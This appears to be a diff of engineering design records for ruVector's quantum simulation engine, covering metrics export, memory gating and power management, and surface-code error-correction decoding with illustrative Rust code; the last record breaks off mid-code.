| ------------------- | ----------------------- |
| CPU: 34% | #a3f2.. 24q 230ms OK |
| Memory: 61% (49/80 GiB) | #b891.. 16q 12ms OK |
| Threads: 64/256 active | #c4d0.. 30q 1.2s OK |
| | #d122.. 35q ERR OOM |
+------------------------------------------------------------------+
```
Metrics are published via the existing `ruvector-metrics` WebSocket feed:
```json
{
"source": "ruqu",
"type": "simulation_complete",
"timestamp": "2026-02-06T14:23:01.442Z",
"data": {
"simulation_id": "a3f2e891-...",
"qubit_count": 24,
"execution_time_ms": 230.4,
"peak_memory_bytes": 268435456,
"backend": "StateVector",
"gates_per_second": 2147483648,
"success": true
}
}
```
### 9. Prometheus / OpenTelemetry Export
For external monitoring, the native metrics sink exports standard Prometheus
metrics:
```
# HELP ruqu_simulations_total Total quantum simulations executed
# TYPE ruqu_simulations_total counter
ruqu_simulations_total{backend="state_vector",status="success"} 1847
ruqu_simulations_total{backend="state_vector",status="error"} 3
ruqu_simulations_total{backend="tensor_network",status="success"} 241
# HELP ruqu_execution_time_ms Simulation execution time histogram
# TYPE ruqu_execution_time_ms histogram
ruqu_execution_time_ms_bucket{backend="state_vector",le="10"} 423
ruqu_execution_time_ms_bucket{backend="state_vector",le="100"} 1201
ruqu_execution_time_ms_bucket{backend="state_vector",le="1000"} 1834
ruqu_execution_time_ms_bucket{backend="state_vector",le="+Inf"} 1847
# HELP ruqu_peak_memory_bytes Peak memory during simulation
# TYPE ruqu_peak_memory_bytes gauge
ruqu_peak_memory_bytes 4294967296
# HELP ruqu_gates_per_second Gate application throughput
# TYPE ruqu_gates_per_second gauge
ruqu_gates_per_second 2.1e9
# HELP ruqu_max_supported_qubits Maximum qubits based on available memory
# TYPE ruqu_max_supported_qubits gauge
ruqu_max_supported_qubits 33
```
## Consequences
### Positive
1. **Unified observability**: Quantum simulation telemetry integrates seamlessly
with ruVector's existing monitoring infrastructure.
2. **Cross-platform**: The trait-based sink design supports native, WASM, and
testing environments without code changes in the engine.
3. **Actionable errors**: Structured errors with suggestions reduce debugging time
and improve developer experience.
4. **Performance visibility**: Gates-per-second, memory consumption, and backend
selection metrics enable informed performance tuning.
5. **Compliance ready**: Structured logging with simulation IDs supports audit
trail requirements.
### Negative
1. **Metric cardinality**: High-frequency simulations could generate significant
metric volume. Mitigated by aggregation at the sink level.
2. **WASM callback overhead**: JSON serialization for WASM metrics adds ~0.1ms per
simulation. Acceptable for typical workloads.
3. **Tracing overhead at DEBUG/TRACE**: Enabled tracing at low levels adds
measurable overhead. Production deployments should use INFO or above.
4. **Schema evolution**: Changes to `SimulationMetrics` require versioned handling
in consumers.
### Risks and Mitigations
| Risk | Mitigation |
|---|---|
| Metric volume overwhelming storage | Configurable sampling rate; aggregate in sink |
| WASM callback exceptions | Catch JS exceptions in callback wrapper; log to console |
| Schema breaking changes | Version field in metrics; consumer-side version dispatch |
| TRACE logging for large circuits | Qubit-count gate prevents amplitude logging above n=10 |
## References
- `ruvector-metrics` crate: internal metrics infrastructure
- Rust `tracing` crate: https://docs.rs/tracing
- OpenTelemetry Rust SDK: https://docs.rs/opentelemetry
- ADR-QE-005: WASM Compilation Target (WASM constraints)
- ADR-QE-011: Memory Gating & Power Management (resource monitoring)
- Prometheus exposition format: https://prometheus.io/docs/instrumenting/exposition_formats/

View File

@@ -0,0 +1,628 @@
# ADR-QE-011: Memory Gating & Power Management
**Status**: Proposed
**Date**: 2026-02-06
**Authors**: ruv.io, RuVector Team
**Deciders**: Architecture Review Board
---
## Context
ruVector is designed to operate within the Cognitum computing paradigm: a tile-based
architecture with 256 low-power processor cores, event-driven activation, and
aggressive power gating. Agents (software components) remain fully dormant until an
event triggers their activation. Once their work completes, they release all
resources and return to dormancy.
The quantum simulation engine must adhere to this model:
1. **Zero idle footprint**: When no simulation is running, the engine consumes zero
CPU cycles and zero heap memory beyond its compiled code and static data.
2. **Rapid activation**: The engine must be ready to execute a simulation within
microseconds of receiving a request.
3. **Prompt resource release**: Upon simulation completion (or failure), all
allocated memory is immediately freed.
4. **Predictable memory**: Callers must be able to determine exact memory
requirements before committing to a simulation.
### Memory Scale
The state vector for n qubits requires 2^n complex amplitudes, each consuming 16
bytes (two f64 values):
| Qubits | Amplitudes | Memory | Notes |
|--------|-----------|--------|-------|
| 10 | 1,024 | 16 KiB | Trivial |
| 15 | 32,768 | 512 KiB | Small |
| 20 | 1,048,576 | 16 MiB | Moderate |
| 25 | 33,554,432 | 512 MiB | Large |
| 28 | 268,435,456 | 4 GiB | Needs dedicated memory |
| 30 | 1,073,741,824 | 16 GiB | Workstation-class |
| 32 | 4,294,967,296 | 64 GiB | Server-class |
| 35 | 34,359,738,368 | 512 GiB | HPC |
| 40 | 1,099,511,627,776 | 16 TiB | Infeasible (state vector) |
Each additional qubit doubles memory. This exponential scaling makes memory the
primary resource constraint and the most important resource to manage.
### Edge and Embedded Constraints
On edge devices (embedded ruVector nodes, IoT gateways, mobile processors), memory
is severely limited:
| Platform | Typical RAM | Max qubits (state vector) |
|----------|------------|--------------------------|
| Cognitum tile (single) | 256 MiB | 23 |
| Cognitum tile cluster (4) | 1 GiB | 25 |
| Raspberry Pi 4 | 8 GiB | 28 |
| Mobile device | 4-6 GiB | 27-28 (with other apps) |
| Laptop | 16-64 GiB | 29-31 |
| Server | 256-512 GiB | 33-34 |
### WASM Memory Model
WebAssembly uses a linear memory that can grow but cannot shrink. Once a large
simulation allocates pages, those pages remain mapped until the WASM instance is
destroyed. This is a fundamental platform limitation that must be documented and
accounted for.
## Decision
### 1. Zero-Idle Footprint Architecture
The quantum engine is implemented as a pure library with no runtime overhead:
```rust
// The engine is a collection of functions and types.
// No background threads, no event loops, no persistent state.
// When not called, it consumes exactly zero CPU and zero heap.
pub struct QuantumEngine; // Zero-sized type; purely a namespace
impl QuantumEngine {
/// Execute a simulation. All resources are allocated on entry
/// and freed on exit (or on error).
pub fn execute(
circuit: &QuantumCircuit,
shots: usize,
config: &SimulationConfig,
) -> Result<SimulationResult, SimulationError> {
// 1. Estimate and validate memory
let required = Self::estimate_memory(circuit.num_qubits());
Self::validate_memory_available(required)?;
// 2. Allocate state vector (the big allocation)
let mut state = Self::allocate_state(circuit.num_qubits())?;
// 3. Execute gates (all computation happens here)
Self::apply_gates(circuit, &mut state, config)?;
// 4. Measure (if requested)
let measurements = Self::measure(&state, shots)?;
// 5. Build result (copies out what we need)
let result = SimulationResult::from_state_and_measurements(
&state, measurements, circuit,
);
// 6. state is dropped here -- Vec<Complex<f64>> deallocated
// No cleanup needed. No finalizers. Just drop.
Ok(result)
}
// state goes out of scope and is deallocated by Rust's ownership system
}
```
Key properties:
- No `new()` or `init()` methods that create persistent state.
- No `Drop` impl with complex cleanup logic.
- No `Arc`, `Mutex`, or shared state between calls.
- Each call is fully independent and self-contained.
### 2. On-Demand Allocation Strategy
State vectors are allocated at simulation start and freed at simulation end:
```rust
fn allocate_state(n_qubits: u32) -> Result<StateVector, SimulationError> {
let num_amplitudes = 1_usize.checked_shl(n_qubits)
.ok_or(SimulationError::QubitLimitExceeded {
requested: n_qubits,
maximum: (usize::BITS - 1) as u32,
estimated_memory_bytes: u64::MAX,
available_memory_bytes: estimate_available_memory() as u64,
})?;
let required_bytes = num_amplitudes
.checked_mul(std::mem::size_of::<Complex<f64>>())
.ok_or(SimulationError::MemoryAllocationFailed {
requested_bytes: u64::MAX,
qubit_count: n_qubits,
suggestion: "Qubit count exceeds addressable memory",
})?;
// Attempt allocation. Rust's global allocator will return an error
// (with #[global_allocator] configured) or the OS will OOM-kill us.
// We use try_reserve to handle this gracefully.
let mut amplitudes = Vec::new();
amplitudes.try_reserve_exact(num_amplitudes)
.map_err(|_| SimulationError::MemoryAllocationFailed {
requested_bytes: required_bytes as u64,
qubit_count: n_qubits,
suggestion: "Reduce qubit count or use tensor-network backend",
})?;
// Initialize to |00...0> state
amplitudes.resize(num_amplitudes, Complex::new(0.0, 0.0));
amplitudes[0] = Complex::new(1.0, 0.0);
Ok(StateVector { amplitudes, n_qubits })
}
```
The allocation sequence:
```
IDLE (zero memory)
|
v
estimate_memory(n) --> returns bytes needed
|
v
validate_memory_available(bytes) --> checks against OS/platform limits
| returns Err if insufficient
v
Vec::try_reserve_exact(2^n) --> attempts allocation
| returns Err on failure (no panic)
v
ALLOCATED (2^n * 16 bytes on heap)
|
v
[... simulation runs ...]
|
v
Vec::drop() --> automatic deallocation
|
v
IDLE (zero memory)
```
### 3. Memory Estimation API
Callers can query exact memory requirements before committing:
```rust
/// Returns the number of bytes required to simulate n_qubits.
/// This accounts for the state vector plus working memory for
/// gate application (temporary buffers, measurement arrays, etc.).
///
/// # Returns
/// - `Ok(bytes)` if the qubit count is representable
/// - `Err(...)` if 2^n_qubits overflows usize
pub fn estimate_memory(n_qubits: u32) -> Result<MemoryEstimate, SimulationError> {
let num_amplitudes = 1_usize.checked_shl(n_qubits)
.ok_or(SimulationError::QubitLimitExceeded {
requested: n_qubits,
maximum: (usize::BITS - 1) as u32,
estimated_memory_bytes: u64::MAX,
available_memory_bytes: 0,
})?;
let state_vector_bytes = num_amplitudes * std::mem::size_of::<Complex<f64>>();
// Working memory: temporary buffer for gate application (1 amplitude slice)
// Plus measurement result storage
let working_bytes = num_amplitudes * std::mem::size_of::<Complex<f64>>() / 4;
// Thread-local scratch space (per Rayon thread)
let thread_count = rayon::current_num_threads();
let scratch_per_thread = 64 * 1024; // 64 KiB per thread for local buffers
let thread_scratch = thread_count * scratch_per_thread;
Ok(MemoryEstimate {
state_vector_bytes: state_vector_bytes as u64,
working_bytes: working_bytes as u64,
thread_scratch_bytes: thread_scratch as u64,
total_bytes: (state_vector_bytes + working_bytes + thread_scratch) as u64,
num_amplitudes: num_amplitudes as u64,
})
}
#[derive(Debug, Clone)]
pub struct MemoryEstimate {
/// Bytes for the state vector (dominant cost).
pub state_vector_bytes: u64,
/// Bytes for gate-application working memory.
pub working_bytes: u64,
/// Bytes for thread-local scratch space.
pub thread_scratch_bytes: u64,
/// Total estimated bytes.
pub total_bytes: u64,
/// Number of complex amplitudes.
pub num_amplitudes: u64,
}
impl MemoryEstimate {
/// Returns true if the estimate fits within the given byte budget.
pub fn fits_in(&self, available_bytes: u64) -> bool {
self.total_bytes <= available_bytes
}
/// Suggest the maximum qubits for a given memory budget.
pub fn max_qubits_for(available_bytes: u64) -> u32 {
// Each qubit doubles memory; find largest n where 20 * 2^n <= available
// Factor of 20 accounts for 16-byte amplitudes + 25% working memory
let effective = available_bytes / 20;
if effective == 0 { return 0; }
(effective.ilog2()) as u32
}
}
```
### 4. Allocation Failure Handling
The engine never panics on allocation failure. All paths return structured errors:
```rust
// Pattern: every allocation is fallible and returns a descriptive error.
// State vector allocation failure:
SimulationError::MemoryAllocationFailed {
requested_bytes: 17_179_869_184, // 16 GiB
qubit_count: 30,
suggestion: "Reduce qubit count by 2 (to 28, ~4 GiB) or enable tensor-network backend",
}
// Integer overflow (qubit count too large):
SimulationError::QubitLimitExceeded {
requested: 64,
maximum: 33, // based on available memory
estimated_memory_bytes: u64::MAX,
available_memory_bytes: 68_719_476_736, // 64 GiB
}
```
Decision tree on allocation failure:
```
Memory allocation failed
|
+-- Is tensor-network feature enabled?
| |
| +-- YES: Suggest tensor-network backend
| | (may work if circuit has low treewidth)
| |
| +-- NO: Suggest reducing qubit count
| Calculate: max_qubits = floor(log2(available / 20))
| Suggest: "Reduce to {max_qubits} qubits ({memory} bytes)"
|
+-- Is the request wildly over budget (>100x)?
| |
| +-- YES: "Circuit requires {X} GiB but only {Y} MiB available"
| |
| +-- NO: "Circuit requires {X} GiB, {Y} GiB available.
| Reducing by {delta} qubits would fit."
|
+-- Return SimulationError (no panic, no abort)
```
### 5. CPU Yielding for Long Simulations
For simulations estimated to exceed 100ms, the engine can optionally yield between
gate batches to allow the OS scheduler to manage power states:
```rust
pub struct YieldConfig {
/// Enable cooperative yielding between gate batches.
/// Default: false (maximum throughput).
pub enabled: bool,
/// Number of gates to apply before yielding.
/// Default: 1000.
pub gates_per_slice: usize,
/// Yield mechanism.
/// Default: ThreadYield (std::thread::yield_now).
pub yield_strategy: YieldStrategy,
}
pub enum YieldStrategy {
/// Call std::thread::yield_now() between slices.
ThreadYield,
/// Sleep for specified duration between slices.
Sleep(Duration),
/// Call a user-provided callback between slices.
Callback(Box<dyn Fn(SliceProgress) + Send>),
}
pub struct SliceProgress {
pub gates_completed: u64,
pub gates_remaining: u64,
pub elapsed: Duration,
pub estimated_remaining: Duration,
}
// Usage in gate application loop:
fn apply_gates_with_yield(
circuit: &QuantumCircuit,
state: &mut StateVector,
yield_config: &YieldConfig,
) -> Result<(), SimulationError> {
let gates = circuit.gates();
for (i, gate) in gates.iter().enumerate() {
apply_single_gate(gate, state)?;
if yield_config.enabled && (i + 1) % yield_config.gates_per_slice == 0 {
match &yield_config.yield_strategy {
YieldStrategy::ThreadYield => std::thread::yield_now(),
YieldStrategy::Sleep(d) => std::thread::sleep(*d),
YieldStrategy::Callback(cb) => cb(SliceProgress {
gates_completed: (i + 1) as u64,
gates_remaining: (gates.len() - i - 1) as u64,
elapsed: start.elapsed(),
estimated_remaining: estimate_remaining(i, gates.len(), start),
}),
}
}
}
Ok(())
}
```
Yield is **disabled by default** to maximize throughput. It is primarily intended
for:
- Edge devices where power management is critical.
- Interactive applications where UI responsiveness matters.
- Long-running simulations (>1 second) where progress reporting is needed.
### 6. Thread Management
The quantum engine does not create or manage its own threads:
```
+-----------------------------------------------+
| Global Rayon Thread Pool |
| (shared by all ruVector subsystems) |
| |
| [Thread 0] [Thread 1] ... [Thread N-1] |
| ^ ^ ^ |
| | | | |
| +--+---+ +--+---+ +---+--+ |
| | ruQu | | ruQu | | idle | |
| | gate | | gate | | | |
| | apply | | apply| | | |
| +-------+ +------+ +------+ |
| |
| During simulation: threads work on gates |
| After simulation: threads return to pool |
| Pool idle: OS can power-gate cores |
+-----------------------------------------------+
```
Key properties:
- Rayon's global thread pool is initialized once by `ruvector-core` at startup.
- The quantum engine calls `rayon::par_iter()` and related APIs, borrowing threads
temporarily.
- When simulation completes, all threads are returned to the global pool.
- If no ruVector work is pending, Rayon threads park (blocking on a condvar),
consuming zero CPU. The OS can then power-gate the underlying cores.
### 7. WASM Memory Considerations
WebAssembly linear memory has a specific behavior that affects resource management:
```
WASM Memory Layout
+------------------+------------------+
| Initial pages | Grown pages |
| (compiled size) | (runtime alloc) |
+------------------+------------------+
0 initial_size current_size
Growth: memory.grow(delta_pages) -> adds pages to the end
Shrink: NOT SUPPORTED in WASM spec
After 25-qubit simulation:
+------------------+----------------------------------+
| Initial (1 MiB) | Grown for state vec (512 MiB) | <- HIGH WATER MARK
+------------------+----------------------------------+
After simulation completes:
+------------------+----------------------------------+
| Initial (1 MiB) | FREED internally but pages |
| | still mapped (512 MiB virtual) |
+------------------+----------------------------------+
The Rust allocator returns memory to its free list,
but WASM pages are not returned to the host.
```
**Implications and mitigations**:
1. **Document the behavior**: Users must understand that WASM memory is a high-water
mark. A 25-qubit simulation permanently increases the WASM instance's memory
footprint to ~512 MiB.
2. **Instance recycling**: For applications that run multiple simulations, create a
new WASM instance periodically to reset the memory high-water mark.
3. **Memory budget enforcement**: The WASM host can set `WebAssembly.Memory` with a
`maximum` parameter to cap growth:
```javascript
const memory = new WebAssembly.Memory({
initial: 16, // 1 MiB
maximum: 8192, // 512 MiB cap
});
```
4. **Pre-check in WASM**: The engine's `estimate_memory()` function works in WASM
and should be called before simulation to verify the allocation will succeed.
### 8. Cognitum Tile Integration
On Cognitum's tile-based architecture, the quantum engine maps to tiles as follows:
```
Cognitum Processor (256 tiles)
+--------+--------+--------+--------+
| Tile 0 | Tile 1 | Tile 2 | Tile 3 | <- Assigned to quantum sim
| ACTIVE | ACTIVE | ACTIVE | ACTIVE |
+--------+--------+--------+--------+
| Tile 4 | Tile 5 | Tile 6 | Tile 7 | <- Other ruVector work (or sleeping)
| sleep | vecDB | sleep | sleep |
+--------+--------+--------+--------+
| ... | ... | ... | ... |
| sleep | sleep | sleep | sleep | <- Power gated (zero consumption)
+--------+--------+--------+--------+
```
**Power state diagram for a quantum simulation lifecycle**:
```
State: ALL_TILES_IDLE
|
| Simulation request arrives
v
State: ALLOCATING
Action: Wake tiles 0-3 (or however many are needed)
Action: Allocate state vector across tile-local memory
Power: Tiles 0-3 ACTIVE, rest SLEEP
|
v
State: SIMULATING
Action: Apply gates in parallel across active tiles
Power: Tiles 0-3 at full clock rate
Duration: microseconds to seconds depending on circuit
|
v
State: MEASURING
Action: Sample measurement outcomes
Power: Tile 0 only (measurement is sequential)
|
v
State: DEALLOCATING
Action: Free state vector
Action: Return tiles to idle pool
|
v
State: ALL_TILES_IDLE
Power: Tiles 0-3 back to SLEEP
Memory: Zero heap allocation
```
**Tile assignment policy**:
- Small simulations (n <= 20): 1 tile sufficient.
- Medium simulations (20 < n <= 25): 2-4 tiles for parallel gate application.
- Large simulations (25 < n <= 30): All available tiles.
- The tile scheduler (part of Cognitum runtime) handles assignment. The quantum
engine simply uses Rayon parallelism; the runtime maps Rayon threads to tiles.
### 9. Memory Budget Table
Quick reference for capacity planning:
| Qubits | State Vector | Working Memory | Total | Platform Fit |
|--------|-------------|---------------|-------|-------------|
| 10 | 16 KiB | 4 KiB | 20 KiB | Any |
| 12 | 64 KiB | 16 KiB | 80 KiB | Any |
| 14 | 256 KiB | 64 KiB | 320 KiB | Any |
| 16 | 1 MiB | 256 KiB | 1.3 MiB | Any |
| 18 | 4 MiB | 1 MiB | 5 MiB | Any |
| 20 | 16 MiB | 4 MiB | 20 MiB | Any |
| 22 | 64 MiB | 16 MiB | 80 MiB | Cognitum single tile |
| 24 | 256 MiB | 64 MiB | 320 MiB | Cognitum 2+ tiles |
| 26 | 1 GiB | 256 MiB | 1.3 GiB | Cognitum cluster |
| 28 | 4 GiB | 1 GiB | 5 GiB | Laptop / RPi 8GB |
| 30 | 16 GiB | 4 GiB | 20 GiB | Workstation |
| 32 | 64 GiB | 16 GiB | 80 GiB | Server |
| 34 | 256 GiB | 64 GiB | 320 GiB | Large server |
### 10. Allocation and Deallocation Sequence Diagram
```
Caller Engine OS/Allocator
| | |
| execute(circuit) | |
|-------------------->| |
| | |
| | estimate_memory(n) |
| | validate_available() |
| | |
| | try_reserve_exact(2^n) |
| |------------------------>|
| | |
| | Ok(ptr) or Err |
| |<------------------------|
| | |
| | [if Err: return |
| | SimulationError] |
| | |
| | initialize |00...0> |
| | apply gates |
| | measure |
| | |
| | build result |
| | (copies measurements, |
| | expectation values) |
| | |
| | drop(state_vector) |
| |------------------------>|
| | | free(ptr, 2^n * 16)
| | |
| Ok(result) | |
|<--------------------| |
| | |
| [Engine holds ZERO | |
| heap memory now] | |
```
## Consequences
### Positive
1. **True zero-idle cost**: No background resource consumption. Perfectly aligned
with Cognitum's event-driven architecture and power gating.
2. **Predictable memory**: `estimate_memory()` gives exact requirements before
committing, preventing OOM surprises.
3. **Graceful degradation**: Allocation failures return structured errors with
actionable suggestions, never panics.
4. **Platform portable**: The same allocation strategy works on native (Linux, macOS,
Windows), WASM, and embedded (Cognitum tiles).
5. **No resource leaks**: Rust's ownership system guarantees deallocation on all
exit paths (success, error, panic).
### Negative
1. **No state caching**: Each simulation allocates and deallocates independently.
Repeated simulations on the same qubit count pay allocation cost each time.
Mitigation: allocation is O(2^n) but fast compared to O(G * 2^n) simulation.
2. **WASM memory high-water mark**: Cannot reclaim WASM linear memory pages.
Documented as a platform limitation with instance-recycling workaround.
3. **No memory pooling**: Could theoretically amortize allocation across simulations,
but this conflicts with the zero-idle-footprint requirement.
4. **Yield overhead**: When enabled, cooperative yielding adds per-slice overhead.
Mitigated by making it opt-in and configurable.
### Risks and Mitigations
| Risk | Likelihood | Impact | Mitigation |
|---|---|---|---|
| OOM despite estimate_memory check | Low | Crash | Check returns conservative estimate including working memory |
| WASM instance runs out of address space | Medium | Failure | Set `WebAssembly.Memory` maximum; document limitation |
| Allocation latency spike (OS page faults) | Medium | Slow start | Consider `madvise` / `mlock` hints for large allocations |
| Rayon thread pool contention | Medium | Degraded perf | Quantum engine yields between slices; Rayon work-stealing handles contention |
## References
- Cognitum Architecture Specification: event-driven tile-based computing
- Rust `Vec::try_reserve_exact`: https://doc.rust-lang.org/std/vec/struct.Vec.html#method.try_reserve_exact
- WebAssembly Memory: https://webassembly.github.io/spec/core/syntax/modules.html#memories
- Rayon thread pool: https://docs.rs/rayon
- ADR-QE-001: Core Engine Architecture (zero-overhead design principle)
- ADR-QE-005: WASM Compilation Target (WASM constraints)
- ADR-QE-009: Tensor Network Evaluation Mode (alternative for large circuits)
- ADR-QE-010: Observability & Monitoring (memory metrics reporting)

View File

@@ -0,0 +1,876 @@
# ADR-QE-012: Min-Cut Coherence Integration
**Status**: Proposed
**Date**: 2026-02-06
**Authors**: ruv.io, RuVector Team
**Deciders**: Architecture Review Board
---
## Context
The ruVector ecosystem contains several components that must work together for
quantum error correction (QEC) simulation:
1. **ruQu (existing)**: A real-time coherence gating system that performs
boundary-to-boundary min-cut analysis on surface code error patterns. It includes
a three-filter syndrome pipeline (Structural | Shift | Evidence), a Minimum Weight
Perfect Matching (MWPM) decoder, and an early warning system that predicts
correlated failures 100+ cycles ahead.
2. **ruvector-mincut (existing)**: A graph partitioning crate that computes minimum
cuts and balanced partitions. Currently used for vector index sharding but
directly applicable to syndrome graph decomposition.
3. **Coherence Engine (ADR-014)**: Computes coherence energy via sheaf Laplacian
analysis. The "mincut-gated-transformer" concept uses coherence energy to skip
computation on "healthy" regions, achieving up to 50% FLOPs reduction.
4. **Quantum Simulation Engine (new, ADR-QE-001 through ADR-QE-011)**: The
state-vector and tensor-network simulator being designed in this ADR series.
The challenge is integrating these components into a coherent (pun intended)
pipeline where simulated quantum circuits produce syndromes, those syndromes are
decoded in real-time, and coherence analysis feeds back into simulation parameters.
### Surface Code Background
A distance-d surface code encodes 1 logical qubit in d^2 data qubits + (d^2 - 1)
ancilla qubits:
| Distance | Data qubits | Ancilla qubits | Total qubits | Error threshold |
|----------|------------|----------------|--------------|----------------|
| 3 | 9 | 8 | 17 | ~1% |
| 5 | 25 | 24 | 49 | ~1% |
| 7 | 49 | 48 | 97 | ~1% |
| 9 | 81 | 80 | 161 | ~1% |
| 11 | 121 | 120 | 241 | ~1% |
Syndrome extraction involves measuring ancilla qubits each cycle. The measurement
outcomes (syndromes) indicate where errors may have occurred. The decoder's job is
to determine the most likely error pattern from the syndrome and apply corrections.
### Performance Requirements
ruQu's existing decoder targets P99 latency of <4 microseconds for syndrome
decoding. The integrated simulation + decode pipeline must meet:
| Operation | Target latency | Notes |
|-----------|---------------|-------|
| Single syndrome decode | <4 us | Existing ruQu target (MWPM) |
| Syndrome extraction sim | <5 ms | One round of ancilla measurement |
| Full cycle (sim + decode) | <10 ms | Distance-3, single error cycle |
| Full cycle (sim + decode) | <50 ms | Distance-5 |
| Full cycle (sim + decode) | <200 ms | Distance-7 (tensor network) |
| Early warning evaluation | <1 ms | Check predicted vs actual syndromes |
## Decision
### 1. Architecture Overview
The integration follows a pipeline architecture where data flows from quantum
simulation through syndrome extraction, filtering, decoding, and coherence analysis:
```
+------------------------------------------------------------------+
| Quantum Error Correction Pipeline |
+------------------------------------------------------------------+
| |
| +------------------+ +---------------------+ |
| | Quantum Circuit | | Error Model | |
| | (surface code |---->| (depolarizing, | |
| | syndrome | | biased noise, | |
| | extraction) | | correlated) | |
| +------------------+ +---------------------+ |
| | | |
| v v |
| +--------------------------------------------+ |
| | Quantum Simulation Engine | |
| | (state vector or tensor network) | |
| | - Simulates noisy syndrome extraction | |
| | - Outputs ancilla measurement outcomes | |
| +--------------------------------------------+ |
| | |
| | syndrome bitstring |
| v |
| +--------------------------------------------+ |
| | SyndromeFilter (ruQu) | |
| | Filter 1: Structural (lattice geometry) | |
| | Filter 2: Shift (temporal correlations) | |
| | Filter 3: Evidence (statistical weight) | |
| +--------------------------------------------+ |
| | |
| | filtered syndrome |
| v |
| +--------------------------------------------+ |
| | MWPM Decoder (ruQu) | |
| | - Minimum Weight Perfect Matching | |
| | - Returns Pauli correction operators | |
| | - Target: <4 us P99 latency | |
| +--------------------------------------------+ |
| | |
| | correction operators (X, Z Paulis) |
| v |
| +--------------------------------------------+ |
| | Correction Application | |
| | - Apply Pauli gates to simulated state | |
| | - Verify logical qubit integrity | |
| +--------------------------------------------+ |
| | |
| | corrected state |
| v |
| +-----------------------+ +-------------------------+ |
| | Coherence Engine | | Early Warning System | |
| | (sheaf Laplacian) | | (100+ cycle prediction) | |
| | - Compute coherence |<-->| - Correlate historical | |
| | energy | | syndromes | |
| | - Gate simulation | | - Predict failures | |
| | FLOPs if healthy | | - Feed back to sim | |
| +-----------------------+ +-------------------------+ |
| | | |
| v v |
| +--------------------------------------------+ |
| | Cryptographic Audit Trail | |
| | - Ed25519 signed decisions | |
| | - Blake3 hash chains | |
| | - Every syndrome, decode, correction logged | |
| +--------------------------------------------+ |
| |
+------------------------------------------------------------------+
```
### 2. Syndrome-to-Decoder Bridge
The quantum simulation engine outputs raw measurement bitstrings. These are
converted to the syndrome format expected by ruQu's decoder:
```rust
/// Bridge between quantum simulation output and ruQu decoder input.
pub struct SyndromeBridge;
impl SyndromeBridge {
/// Convert simulation measurement outcomes to ruQu syndrome format.
///
/// The simulation measures ancilla qubits. A detection event occurs
/// when an ancilla measurement differs from the previous round
/// (or from the expected value in the first round).
pub fn extract_syndrome(
measurements: &MeasurementOutcome,
code: &SurfaceCodeLayout,
previous_round: Option<&SyndromeRound>,
) -> SyndromeRound {
let mut detections = Vec::new();
for ancilla in code.ancilla_qubits() {
let current = measurements.get(ancilla.index());
let previous = previous_round
.map(|r| r.get(ancilla.id()))
.unwrap_or(0); // Expected value in first round
if current != previous {
detections.push(Detection {
ancilla_id: ancilla.id(),
ancilla_type: ancilla.stabilizer_type(), // X or Z
position: ancilla.lattice_position(),
round: measurements.round_number(),
});
}
}
SyndromeRound {
round: measurements.round_number(),
detections,
raw_measurements: measurements.ancilla_bits().to_vec(),
}
}
/// Apply decoder corrections back to the simulation state.
pub fn apply_corrections(
state: &mut StateVector,
corrections: &DecoderCorrection,
code: &SurfaceCodeLayout,
) {
for (qubit_id, pauli) in &corrections.operations {
let qubit_index = code.data_qubit_index(*qubit_id);
match pauli {
Pauli::X => state.apply_x(qubit_index),
Pauli::Z => state.apply_z(qubit_index),
Pauli::Y => {
state.apply_x(qubit_index);
state.apply_z(qubit_index);
}
Pauli::I => {} // No correction needed
}
}
}
}
```
### 3. SyndromeFilter Pipeline (ruQu Integration)
The three-filter pipeline processes raw syndromes before decoding:
```rust
/// ruQu's three-stage syndrome filtering pipeline.
pub struct SyndromeFilterPipeline {
structural: StructuralFilter,
shift: ShiftFilter,
evidence: EvidenceFilter,
}
impl SyndromeFilterPipeline {
/// Process a syndrome round through all three filters.
pub fn filter(&mut self, syndrome: SyndromeRound) -> FilteredSyndrome {
// Filter 1: Structural
// Removes detections inconsistent with lattice geometry.
// E.g., isolated detections with no nearby partner.
let after_structural = self.structural.apply(&syndrome);
// Filter 2: Shift
// Accounts for temporal correlations between rounds.
// Detections that appear and disappear in consecutive rounds
// may be measurement errors (not data errors).
let after_shift = self.shift.apply(&after_structural);
// Filter 3: Evidence
// Weights remaining detections by statistical evidence.
// Uses error model probabilities to assign confidence scores.
let after_evidence = self.evidence.apply(&after_shift);
after_evidence
}
}
```
### 4. MWPM Decoder Integration
The filtered syndrome feeds into ruQu's MWPM decoder:
```rust
/// Interface to ruQu's Minimum Weight Perfect Matching decoder.
pub trait SyndromeDecoder {
/// Decode a filtered syndrome into correction operations.
/// Target: <4 microseconds P99 latency.
fn decode(
&self,
syndrome: &FilteredSyndrome,
code: &SurfaceCodeLayout,
) -> DecoderCorrection;
/// Decode with timing information for performance monitoring.
fn decode_timed(
&self,
syndrome: &FilteredSyndrome,
code: &SurfaceCodeLayout,
) -> (DecoderCorrection, DecoderTiming);
}
pub struct DecoderCorrection {
/// Pauli corrections to apply to data qubits.
pub operations: Vec<(QubitId, Pauli)>,
/// Confidence score (0.0 = no confidence, 1.0 = certain).
pub confidence: f64,
/// Whether a logical error was detected (correction may be wrong).
pub logical_error_detected: bool,
/// Matching weight (lower is more likely).
pub matching_weight: f64,
}
pub struct DecoderTiming {
/// Total decode time.
pub total_ns: u64,
/// Time spent building the matching graph.
pub graph_construction_ns: u64,
/// Time spent in the MWPM algorithm.
pub matching_ns: u64,
/// Number of detection events in the input.
pub num_detections: usize,
}
```
### 5. Min-Cut Graph Partitioning for Parallel Decoding
For large surface codes (distance >= 7), the syndrome graph can be partitioned
using `ruvector-mincut` for parallel decoding:
```rust
use ruvector_mincut::{partition, PartitionConfig, WeightedGraph};
/// Partition the syndrome graph for parallel decoding.
/// This exploits spatial locality in the surface code: errors in
/// distant regions can be decoded independently.
pub fn parallel_decode(
syndrome: &FilteredSyndrome,
code: &SurfaceCodeLayout,
decoder: &dyn SyndromeDecoder,
) -> DecoderCorrection {
// Build the detection graph (nodes = detections, edges = possible errors)
let detection_graph = build_detection_graph(syndrome, code);
// If small enough, decode directly
if detection_graph.num_nodes() <= 20 {
return decoder.decode(syndrome, code);
}
// Partition the detection graph using ruvector-mincut
let config = PartitionConfig {
num_partitions: estimate_partition_count(&detection_graph),
balance_factor: 1.2,
minimize: Objective::EdgeCut,
};
let partitions = partition(&detection_graph, &config);
// Decode each partition independently (in parallel via Rayon)
let partial_corrections: Vec<DecoderCorrection> = partitions
.par_iter()
.map(|partition| {
let sub_syndrome = syndrome.restrict_to(partition);
decoder.decode(&sub_syndrome, code)
})
.collect();
// Handle boundary edges (detections that span partitions)
let boundary_correction = decode_boundary_edges(
syndrome, code, &partitions, decoder,
);
// Merge all corrections
